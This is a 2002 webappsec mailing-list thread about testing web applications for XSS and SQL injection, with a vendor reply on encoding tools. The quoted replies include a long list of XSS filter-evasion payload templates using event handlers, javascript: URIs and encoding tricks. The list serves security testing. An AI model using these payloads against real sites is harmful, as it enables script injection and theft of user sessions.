Re: encoder

["Kevin Spett" <kspett () spidynamics com>]

You can also probably set up one of the many proxy-based tools (Spike,
WebProxy, Achilles, etc) to do regex replacing for it automatically, or hack
it in yourself if you're handy with code.

WebInspect has tools to automatically do this stuff too, if you don't mind a
commercial solution.  (Free trial at http://www.spidynamics.com/)


Kevin Spett
SPI Labs
http://www.spidynamics.com/


----- Original Message -----
From: "N30" <n30_lists () hotmail com>
To: <webappsec () securityfocus com>
Sent: Thursday, December 19, 2002 5:10 PM
Subject: encoder


> Hi group,
>
> Any links/resources/scripts to conver ASCII characters to unicode / html
> encode /double decode?
> Testing web apps for XSS & SQL injections, a lot of times, sites filter
out
> <> but forget to filter encoded versions of <>.
>
> Thanks in advance
> -N
>
>
>
>
> ---- Original Message -----
> From: "Tomas" <tomasg () extra lt>
> To: <webappsec () securityfocus com>
> Sent: Monday, December 16, 2002 3:42 AM
> Subject: Re: XSS Strings
>
>
> > Hi.
> >
> > here are some more examples:
> >
> > <a href="javas&#99;ript&#35;[code]">
> >   <div onmouseover="[code]">
> >   <img src="javascript:[code]">
> >   <img dynsrc="javascript:[code]"> [IE]
> >   <input type="image" dynsrc="javascript:[code]"> [IE]
> >   <bgsound src="javascript:[code]"> [IE]
> >   &<script>[code]</script>
> >   &{[code]}; [N4]
> >   <img src=&{[code]};> [N4]
> >   <link rel="stylesheet" href="javascript:[code]">
> >   <iframe src="vbscript:[code]"> [IE]
> >   <img src="mocha:[code]"> [N4]
> >   <img src="livescript:[code]"> [N4]
> >   <a href="about:<s&#99;ript>[code]</script>">
> >   <meta http-equiv="refresh" content="0;url=javascript:[code]">
> >   <body onload="[code]">
> >   <div style="background-image: url(javascript:[code]);">
> >   <div style="behaviour: url([link to code]);"> [IE]
> >   <div style="binding: url([link to code]);"> [Mozilla]
> >   <div style="width: expression([code]);"> [IE]
> >   <style type="text/javascript">[code]</style> [N4]
> >   <object classid="clsid:..." codebase="javascript:[code]"> [IE]
> >   <style><!--</style><script>[code]//--></script>
> >   <![CDATA[<!--]]><script>[code]//--></script>
> >   <!-- -- --><script>[code]</script><!-- -- -->
> >   <<script>[code]</script>
> >   <img src="blah"onmouseover="[code]">
> >   <img src="blah>" onmouseover="[code]">
> >   <xml src="javascript:[code]">
> >   <xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>
> >     <div datafld="b" dataformatas="html" datasrc="#X"></div>
> >   [\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]
> >
> >
> >
> > Tomas
> >
> >
> > ----- Original Message -----
> > From: <securityarchitect () hush com>
> > To: <webappsec () securityfocus com>
> > Sent: Monday, December 16, 2002 9:54 AM
> > Subject: XSS Strings
> >
> > > Does anyone have a good list of payloads that will cover the majority
of
> > the options ?